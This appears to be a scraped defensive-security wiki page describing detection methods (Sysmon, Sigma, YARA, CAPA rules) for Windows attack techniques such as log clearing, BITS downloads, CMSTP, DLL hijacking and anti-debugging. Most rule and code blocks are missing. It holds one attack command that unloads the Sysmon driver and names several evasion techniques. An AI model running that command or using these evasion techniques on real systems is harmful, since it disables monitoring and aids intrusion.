General
Detection Techniques
VBA Macros
Detection Techniques
Clearing Logs
Event Log Monitoring:
Look for Event ID 1102 in the Security log and Event ID 104 in the System log.
Command to check logs:
Terminate Event Log Process
Live Analysis:
Check if the Event Log service is running.
Monitor for absence or termination of the
svchost
process associated with the Event Log service.
Invoke-Phant0m
PowerShell Script Block Logging:
Enable Script Block Logging to capture PowerShell script execution.
Look for specific strings or patterns in the script indicative of Invoke-Phant0m.
Mimikatz event::drop
Sysmon Process Access Monitoring:
Monitor for access to the
svchost.exe
process associated with the Event Log service.Sysmon Rule:
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for critical events, including process creation and termination, script execution, and registry changes.
Regular Audits: Conduct regular audits of system logs to identify patterns indicative of tampering.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious activities related to event logging.
Incident Response Plan: Have an incident response plan in place to address scenarios where event logging is compromised.
Detection Techniques
Python Payloads
Sysmon Process Creation Monitoring:
Detect Python command lines with Base64 encoded content.
Sigma Rule:
PowerShell Payloads
Sysmon Process Creation Monitoring:
Detect PowerShell command lines with encodedCommand parameters or Base64 decoding functions.
Sigma Rule:
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for command line process creation, especially for PowerShell and Python.
Regular Audits: Conduct regular audits of system logs to identify patterns indicative of Base64 encoded payloads.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious command line activities.
User Education: Educate users about the risks of executing unknown scripts or command lines.
Detection Techniques
Conhost.exe Misuse
Sysmon Process Creation Monitoring:
Detect process creation events where
conhost.exe
is the parent image.Sysmon Rule:
Note: This rule is for demonstration purposes. In a production environment, it's important to include all process creation events and exclude only specific, known legitimate processes.
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for process creation, especially focusing on parent-child process relationships.
Regular Audits: Conduct regular audits of system logs to identify unusual parent-child process relationships involving
conhost.exe
.Threat Hunting: Apply targeted queries to system logs based on specific hypotheses about potential misuse of
conhost.exe
.Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious process execution patterns.
Detection Techniques
Malicious CHM Files
Sysmon Process Creation Monitoring:
Detect
hh.exe
process creation with command lines referring to CHM files.Monitor for subsequent
cmd.exe
or PowerShell process creations withhh.exe
as the parent process.Sysmon Rule:
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for process creation, especially focusing on
hh.exe
and its child processes.Regular Audits: Conduct regular audits of system logs to identify unusual process creation patterns involving CHM files.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious activities related to CHM file execution.
User Education: Educate users about the risks of opening unknown CHM files and the potential security warnings they should heed.
Detection Techniques
CMSTP Executing DLLs
Sysmon Process Creation and Image Load Monitoring:
Detect
cmstp.exe
process creation events.Monitor for subsequent loading of DLLs, especially from unusual paths.
Sysmon Rule:
CMSTP Executing SCT Files
Sysmon Process Creation Monitoring:
Detect
cmstp.exe
process creation with command lines referencing SCT files.Monitor for network connections or file creations following
cmstp.exe
execution.
Privilege Escalation via CMSTP
Behavioral Analysis:
Monitor for unusual command-line arguments or behaviors associated with
cmstp.exe
.Look for signs of privilege escalation, such as
cmstp.exe
spawning processes with higher privileges.
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for process creation, image load, and command-line execution.
Regular Audits: Conduct regular audits of system logs to identify unusual patterns involving
cmstp.exe
.Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious activities related to
cmstp.exe
execution.User Education: Educate users about the risks of executing unknown INF or SCT files and the potential security implications.
Detection Techniques
BITS for Malicious Downloads
Sysmon Process Creation Monitoring:
Detect
bitsadmin.exe
or PowerShell process creation with BITS-related commands.Sysmon Rule:
Event Viewer Monitoring:
Monitor BITS-Client events under
Microsoft-Windows-Bits-Client/Operational
.Look for events showing URL downloads, especially from suspicious or unknown sources.
Network Intrusion Detection Systems (NIDS):
Monitor for network traffic with
Microsoft-Bits
as the User Agent.Analyze traffic patterns that suggest BITS usage for downloading files from external sources.
Analysis of BITS Database:
For Windows versions prior to Windows 10, use
bits_parser
to parseqmgr[0-9].dat
files.For Windows 10, use tools like
ESEDatabaseViewer
to view the BITS database.
PowerShell BITS Transfer Monitoring:
Monitor for PowerShell commands involving
start-BitsTransfer
.Similar to
bitsadmin.exe
, look for BITS job creation and file download activities.
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for process creation, BITS activities, and network traffic.
Regular Audits: Conduct regular audits of BITS logs and network traffic to identify unusual download patterns.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious BITS activities.
User Education: Educate users about the risks of unauthorized file downloads and the potential misuse of BITS.
Detection Techniques
Malicious Use of ADS
Sysmon File Stream Creation Monitoring:
Detect creation of alternate data streams, especially for executable file types.
Sysmon Rule:
Note: Exclude known legitimate ADS like
Zone.Identifier
.
Execution Monitoring:
Monitor for execution of files from ADS, such as using
wmic
,wscript
, orrundll32
.Look for command-line patterns that indicate execution from an ADS.
Behavioral Analysis:
Analyze file behavior for signs of ADS usage, especially for files with unusual stream data.
Monitor for tools commonly used to manipulate ADS, like
makecab
andextrac32
.
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for file creation, especially focusing on alternate data streams.
Regular Audits: Conduct regular audits of system logs to identify unusual file stream activities.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious file activities related to ADS.
User Education: Educate users about the risks of ADS and the potential for hidden malicious content.
YARA Rule for XOR Detection
Rule: xor_detection
Purpose:
Detects common XOR encryption patterns in files or network traffic.
YARA Rule:
Detection Rules
CAPA for Hook Injection
Rule: set global application hook
Scope: Basic block
Features:
API:
user32.SetWindowsHookEx
Number:
0x3 = WM_GETMESSAGE
Number:
0x0 = dwThreadId
Rule: set application hook
Scope: Function
Features:
API:
user32.SetWindowsHookEx
API:
user32.UnhookWindowsHookEx
SIGMA for Hook Injection
Rule: Hook Injection Detection
Description: Detects instances of hook injection in Windows.
Strings:
SetWindowsHookExA
SetWindowsHookExW
UnhookWindowsHookEx
CallNextHookEx
YARA for Hook Injection
Rule: HookInjection
Condition:
Detects use of
SetWindowsHookEx
,UnhookWindowsHookEx
, andCallNextHookEx
functions.Looks for specific patterns in binary files indicating hook function usage.
Implementation and Usage
Scanning Files and Traffic:
Use CAPA, SIGMA, and YARA to scan files or network traffic for the presence of the defined hook injection patterns.
This can be integrated into automated scanning systems or used for manual analysis.
Integration with Security Tools:
These rules can be integrated into various security tools and platforms for real-time monitoring and alerting.
Threat Hunting and Forensics:
Use these rules as part of a broader threat hunting or forensic analysis to identify potentially malicious files or network activities.
YARA Rule for DLL Search Order Hijacking Detection
Rule: DLLHijacking
Purpose:
Detects patterns in DLL files that are commonly associated with DLL Search Order Hijacking.
YARA Rule:
YARA Rule for DLL Export Name Modification Detection
Rule: ModifyDLLExportName
Purpose:
Detects patterns in DLL files that are commonly associated with modifications to DLL export names.
YARA Rule:
YARA Rule for DLL Proxying Detection
Rule: DLLProxying
Purpose:
Detects patterns in DLL files that are commonly associated with DLL Proxying.
YARA Rule:
Attack Method: Unloading Sysmon Driver
Description
Technique: Malware attempts to unload the Sysmon driver to prevent Sysmon from recording system events.
APIs Used:
GetProcAddress
Attack Code:
Command:
fltMC.exe unload SysmonDrv
Author: Unprotect
YARA Rule for Detecting Unloading of Sysmon Driver
Rule: SysmonEvasion
Purpose:
Detects code patterns associated with attempts to unload the Sysmon driver.
YARA Rule:
Attack Method: Shortcut Hiding
Description
Technique: Embedding malicious code in Windows shortcuts to evade detection by antivirus software.
Attack Code:
Python script to create a Windows shortcut with an embedded file.
Author: Jean-Pierre LESUEUR
Python Script
YARA Rule for Detecting Shortcut Hiding
Rule: YARA_Detect_ShortcutHiding
Purpose:
Detects patterns in Windows shortcut files that are commonly associated with Shortcut Hiding.
YARA Rule:
Attack Method: NtQueryInformationProcess for Anti-Debugging
Description
Technique: Using
NtQueryInformationProcess
to detect if the process is currently being debugged.Attack Code:
Delphi and C# examples to check for debugging environment.
Author: Jean-Pierre LESUEUR
Delphi Code Snippet
Detection Rules
YARA Rule: Detect_NtQueryInformationProcess
Purpose:
Detects the presence of
NtQueryInformationProcess
in code, which is often used for anti-debugging.
YARA Rule:
Attack Method: NtSetInformationThread for Anti-Debugging
Description
Technique: Using
NtSetInformationThread
to hide threads from debuggers.Attack Code:
Delphi example to hide a thread from the debugger.
Author: Jean-Pierre LESUEUR
Delphi Code Snippet
Detection Rules
YARA Rule: Detect_NtSetInformationThread
Purpose:
Detects the presence of
NtSetInformationThread
in code, which is often used for anti-debugging.
YARA Rule:
Attack Method: Checking Mouse Activity for Sandbox Evasion
Description
Technique: Some sandboxes lack mouse movement or a lively desktop background, so malware checks for mouse activity to evade detection.
Attack Code:
Delphi example to check for mouse movement.
Author: Jean-Pierre LESUEUR
Delphi Code Snippet
Detection Rules
CAPA Rule: Detect Unmoving Mouse Cursor
Purpose:
Detects the presence of specific patterns in code related to checking mouse activity, a common sandbox evasion technique.
CAPA Rule:
References
Last updated